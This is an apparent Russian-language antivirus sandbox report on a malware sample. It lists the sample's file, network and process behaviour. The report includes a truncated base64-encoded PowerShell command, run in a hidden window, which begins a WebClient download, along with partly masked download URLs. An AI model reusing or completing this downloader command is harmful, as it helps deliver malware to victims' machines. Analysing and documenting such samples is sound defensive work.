Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAF8ANQA3AF8AXwA4AD0AKAAnAFAAMgAwACcAKwAnADUANgAyACcAKQA7ACQAVgA0ADgANQBfAF8AMAAyAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEsAMQA0AF8ANAA3AD0AKAAnAGgAdAB0AH...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\728.exe
Удаляет следующие файлы
- %HOMEPATH%\728.exe
Сетевая активность
Подключается к
- 'au####rg-auto.com':80
- 'rk####mbing.co.uk':80
- 'vi##to.pro':80
- '35.##0.146.198':80
TCP
Запросы HTTP GET
- http://au####rg-auto.com/BV5eh1IerP
- http://rk####mbing.co.uk/8pgqFhWo_noNLch
- http://vi##to.pro/JggAt4n_6jVK6
UDP
- DNS ASK au####rg-auto.com
- DNS ASK rk####mbing.co.uk
- DNS ASK vi##to.pro
- DNS ASK sa###a.trade
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAF8ANQA3AF8AXwA4AD0AKAAnAFAAMgAwACcAKwAnADUANgAyACcAKQA7ACQAVgA0ADgANQBfAF8AMAAyAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEsAMQA0AF8ANAA3AD0AKAAnAGgAdAB0AH...' (со скрытым окном)
